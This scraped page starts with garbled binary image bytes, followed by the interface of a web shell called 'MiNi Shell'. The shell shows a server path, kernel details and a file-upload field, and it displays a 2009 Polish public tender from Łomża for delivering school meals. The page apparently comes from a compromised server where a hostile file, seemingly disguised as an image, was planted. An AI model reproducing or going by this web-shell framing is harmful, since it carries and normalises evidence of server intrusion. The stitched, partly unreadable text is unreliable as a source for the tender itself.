JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090811/274842-N-2009.html

<p class="kh_header"><b>Łomża: PRZETARG NIEOGRANICZONY 
na przygotowanie i dowożenie posiłków do szkół podstawowych w Jarnutach, Kupiskach, Konarzycach, Wygodzie , Pniewie i Gimnazjum nr 9 w Łomży w roku szkolnym 2009/2010.</b><br>
<b>Numer ogłoszenia: 274842 - 2009; data zamieszczenia: 11.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Gminy Łomża , ul. M. Skłodowskiej-Curie 1a, 18-400 Łomża, woj. podlaskie, tel. 0-86 216 48 80, faks 0-86 216 39 46.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZETARG NIEOGRANICZONY 
na przygotowanie i dowożenie posiłków do szkół podstawowych w Jarnutach, Kupiskach, Konarzycach, Wygodzie , Pniewie i Gimnazjum nr 9 w Łomży w roku szkolnym 2009/2010..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przygotowanie i dowóz posiłków do szkół podstawowych w Kupiskach, Jarnutach, Konarzycach, Pniewie, Wygodzie i Gimnazjum Nr 9 w Łomży w roku szkolnym 2009/2010 w dniach nauki szkolnej . Przewidywana ilość posiłków do przygotowania w całym okresie realizacji zamówienia w przybliżeniu wynosi 36 000.
Posiłki będą to pełne obiady  -  800  kcal , w tym zupa 500 ml +  drugie  danie (np. kotlet mielony- 80 g, ziemniaki- 200g, surówka- 150g,) + napój (np. kompot) 250 ml.
Posiłki muszą odpowiadać normom żywieniowym obowiązujących w punktach zbiorowego żywienia przy następujących założeniach: 
1. Posiłki muszą być przygotowywane zgodnie z zasadami racjonalnego żywienia, muszą być zróżnicowane oraz sporządzane z pełnowartościowych produktów żywnościowych.
 2. Posiłki muszą być przygotowywane i dostarczane przy zachowaniu norm sanitarnych określonych w przepisach dotyczących żywności i żywienia. 
3. Każdy posiłek powinien zawierać produkty będące źródłem białka zwierzęcego (mięso wieprzowe i wołowe, drób, ryby, nabiał) uzupełnione o produkty będące źródłem białka roślinnego (jarzyny, surówki, sałatki, owoce). 
4. Wykonawca będzie realizował zamówienie poprzez przygotowywanie i dostarczanie posiłków w dniach nauki szkolnej w ilości ustalonej na podstawie informacji przekazywanych przez dyrektorów szkół.
5. Szczegóły dotyczące sposobu realizacji zamówienia zostaną ustalone w umowach z dyrektorami szkół , których projekty stanowią załączniki do SIWZ.
Termin realizacji zamówienia.
Od 7 września 2009 r. do 24 czerwca 2010 r..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.52.40.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz sposobu dokonywania oceny spełniania tych warunków.
1)	Warunki podstawowe zgodnie z art. 22 ust. 1 ustawy - w formie oświadczenia na jednym arkuszu (wzór - załącznik nr 2 do SIWZ) w następującym zakresie:
a)	wykonawca posiada uprawnienia do wykonywania określonej działalności,
b)	wykonawca posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia,
c)	wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia, na podstawie art. 24 ustawy.
2) Warunki dodatkowe:
 wykonawca wszystkie zamówienia w ciągu ostatnich dwóch lat wykonał z należytą starannością .
VI.	Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu.
1) Wykonawca przedstawi niżej wymienione dokumenty:
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej,
b) ofertę przetargową z cenami netto i brutto z podatkiem VAT (wzór - załącznik nr 1 do SIWZ),
c) oświadczenie o spełnieniu warunków art. 22 ust. 1 ustawy Prawo zamówień publicznych (wzór - załącznik nr 2 do SIWZ),
e) wykaz wykonanych w ciągu ostatnich dwóch lat usług zbliżonych do zakresu i wartości przedmiotu zamówienia,
g) zaakceptowane (podpisane) wzory umów (wzór - załącznik nr 4,5,6,7,8,9 do SIWZ).
2) Forma składanych dokumentów:
Dokumenty muszą być przedstawione w formie oryginału lub kserokopii poświadczonych za zgodność z oryginałem na każdej stronie przez wykonawcę lub notariusza.
VII.	Informacja o sposobie porozumiewania się zamawiającego z wykonawcami oraz przekazywania oświadczeń i dokumentów, wskazania osób uprawnionych do porozumiewania się z wykonawcami. 
1)	Z zamawiającym można kontaktować się przez telefon oraz bezpośrednio w siedzibie zamawiającego. Wszelkie zapytania dotyczące SIWZ oraz zamówienia należy dostarcza w formie pisemnej określonej ustawą Prawo Zamówień Publicznych.
2)	Zapytania należy kierować pisemnie, zgodnie z zasadą pisemności postępowania.
3)	Zamawiający udzieli odpowiedzi na wszystkie zapytania związane z prowadzonym postępowaniem pod warunkiem, że zapytanie zostanie skierowane i doręczone zamawiającemu nie później niż 6 dni przed terminem składania ofert.
4)	Osobą upoważnioną do kontaktów jest  Agnieszka Krassowska tel. 086 216-39-46
VIII.	Termin związania ofertą. 
Termin związania ofertą zgodny z zapisami art. 85 ust. 1 pkt 1 ustawy Prawo Zamówień Publicznych.
IX.	Opis sposobu przygotowania ofert. 
1)	Wykonawca winien zapoznać się ze wszystkimi dokumentami niniejszej Specyfikacji Istotnych Warunków Zamówienia (SIWZ).
2)	Wszystkie formularze zawarte w SIWZ, a w szczególności formularz oferty i załączniki zostaną wypełnione przez wykonawcę ściśle według wskazówek.. 
3)	Wykonawca powinien wykorzystać SIWZ zgodnie z jej przeznaczeniem i nie udostępniać osobom trzecim.
4)	Każdy wykonawca złoży tylko jedną ofertę zawierająca jednoznacznie opisaną propozycję. Złożenie większej liczby ofert lub oferty zawierającej alternatywy spowoduje odrzucenie wszystkich ofert złożonych przez danego oferenta.
5)	Zamawiający nie dopuszcza możliwości złożenia oferty wariantowej.
6)	Oferta musi obejmować całość zamówienia, nie dopuszcza się składania ofert częściowych.
7)	Wykonawca poniesie wszelkie koszty związane z przygotowaniem i złożeniem oferty.
8)	Zamawiający wykluczy z postępowania wykonawcę, jeżeli stwierdzi, że dostarczone przez niego informacje istotne dla prowadzonego postępowania są nieprawdziwe.
9)	Protokół z przetargu, wraz z załącznikami składanymi w trybie postępowania są jawne zgodnie z zapisami art. 96 ust. 3 ustawy Prawo Zamówień Publicznych.
10)	Wszelkie zaświadczenia i oświadczenia składane przez oferenta wymagają formy pisemnej. Oświadczenia lub zaświadczenia przekazane za pomocą teleksu, poczty elektronicznej lub telefaksu uważa się za złożone w terminie, jeżeli ich treść dotarła do adresata przed upływem terminu składania.
11)	Oferta musi być czytelna oraz podpisana. Należy wypełnić wszystkie dane oferty.
12)	Oferta musi być sporządzona i nadesłana w języku polskim w jednym egzemplarzu. Wszystkie stronice oferty oraz wszelkie miejsca, w których oferent naniósł zmiany winny być parafowane przez osobę podpisującą ofertę.
14)	Ofertę wraz z wszystkimi podpisanymi załącznikami na kolejno ponumerowanych stronach, należy umieścić w zamkniętej kopercie, zapieczętowanej w sposób gwarantujący zachowanie poufności jej treści oraz zabezpieczającej jej nienaruszalność do terminu otwarcia ofert.
15)	Koperta powinna być zaadresowana oraz opisana według wzoru:
Przetarg na przygotowanie posiłków w ramach dożywiania w roku szkolnym 2009/2010.
16)	Kopertę poza oznakowaniem wskazanym w pkt 15 , należy opatrzyć dokładną nazwą i adresem oferenta.
17)	Wykonawca ma prawo przed upływem terminu składania ofert wycofać się z postępowania poprzez złożenie pisemnego powiadomienia (odpowiednio według zasad określonych w pkt 16) z napisem na kopercie   wycofanie. Koperty tak oznaczone będą otwierane w pierwszej kolejności i po stwierdzeniu poprawności postępowania oferenta jego oferta właściwa nie będzie otwierana.
18)	Zamawiający odrzuci ofertę, jeżeli:
a)	będzie niezgodna z ustawą,
b)	jej treść nie będzie odpowiadać treści SIWZ,
c)	jej złożenie stanowić będzie czyn nieuczciwej konkurencji,
d)	zawierać będzie rażąco niską cenę w stosunku do przedmiotu zamówienia,
e)	zostanie złożona przez oferenta wykluczonego z udziału w postępowaniu lub niezaproszonego do udziału w postępowaniu,
f)	zawierać będzie omyłki rachunkowe w obliczeniu ceny, których nie będzie można poprawić na podstawie art. 88 ustawy lub błędu w obliczeniu ceny, lub oferent w terminie 7 dni od otrzymania zawiadomieni nie zgodzi się na poprawienie omyłki rachunkowej.
O odrzuceniu zamawiający niezwłocznie poinformuje oferenta, którego ofertę odrzucił podając uzasadnienie faktyczne i prawne.
X.	Miejsce oraz termin składania i otwarcia ofert. 
1)	Ofertę w zamkniętej i opieczętowanej kopercie należy złożyć do dnia 19 sierpnia 2009 r. do godz. 10:00 w Ośrodku Pomocy Społecznej Gminy Łomża ul. Marii Skłodowskiej- Curie 1a , 18-400 Łomża 
2)	Zamawiający otworzy koperty z ofertami (część jawna - otwarcie przetargu) w dniu  19 sierpnia 2009 r. o godz. 10: 30. 
3)	W trakcie części jawnej Zamawiający przedstawi kwotę, którą zamierza przeznaczyć na wykonanie zadania oraz odczyta nazwę firmy i adres oferenta oraz cenę oferty.
4)	Oferenci mogą być obecni przy otwarciu ofert.
5)	Oferent ma prawo do wglądu do protokołu z przeprowadzonego postępowania zgodnie z art. 96 ust. 3 Ustawy Prawo zamówień publicznych.
 XI.	Opis kryteriów, którymi zamawiający kierował się będzie przy wyborze oferty.
1)	Oferty spełniające warunki formalne oceniane będą według kryterium ceny brutto .
Kryterium ceny będzie rozpatrywane na podstawie stawki podanej przez oferenta w formularzu oferty. Ilość punktów w zakresie od 0 do 100 obliczana będzie według wzoru:
Ilość punktów (a) = najniższa cena x 100  :  cena badana
2) Zamawiający uzna za najkorzystniejszą ofertę, która uzyska najwyższą ilość punktów.
XII.	Informacja o formalnościach, jakie powinny być dopełnione po wyborze oferty w celu zawarcia umowy.
a)	Zamawiający przyzna zamówienie Wykonawcy, którego oferta odpowiada zasadom  określonym w Ustawie z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych i w specyfikacji istotnych warunków zamówienia oraz została uznana za najkorzystniejszą.
b)	 Zamawiający powiadomi wykonawców o wyniku przetargu zgodnie z wymogami ustawy Prawo Zamówień Publicznych. 
c)	 Podpisanie umowy z wybranym Wykonawcą nastąpi po upływie 7 dni od daty ogłoszenia o wyniku przetargu na tablicy ogłoszeń, jednak nie później niż w dniu, w którym upływa termin związania z Ofertą. Umowa zostanie podpisana w siedzibie Zamawiającego.
d)	 Jeżeli Wykonawca, którego oferta została wybrana uchyla się od podpisania umowy Zamawiający wybiera tę ofertę spośród pozostałych ofert, która uzyskała najwyższą liczbę punktów.
e)	 Z chwilą podpisania umowy przetarg uważa się za zakończony.
XIII.	Pouczenie o środkach ochrony prawnej. 
Wykonawcy przysługują środki ochrony prawnej określone w zapisach ustawy Prawo Zamówień Publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca przedstawi niżej wymienione dokumenty:
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej,
b) ofertę przetargową z cenami netto i brutto z podatkiem VAT (wzór - załącznik nr 1 do SIWZ),
c) oświadczenie o spełnieniu warunków art. 22 ust. 1 ustawy Prawo zamówień publicznych (wzór - załącznik nr 2 do SIWZ),
e) wykaz wykonanych w ciągu ostatnich dwóch lat usług zbliżonych do zakresu i wartości przedmiotu zamówienia,
g) zaakceptowane (podpisane) wzory umów (wzór - załącznik nr 4,5,6,7,8,9 do SIWZ)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gminalomza.pl/bip/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Ośrodku Pomocy Społecznej
Gminy Łomża, ul. M. Skłodowskiej - Curie 1a, 18-400 Łomża ,pokój nr  8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2009 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej Gminy Łomża, ul. M. Skłodowskiej - Curie 1a, 18-400 Łomża ,pokój nr  8.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com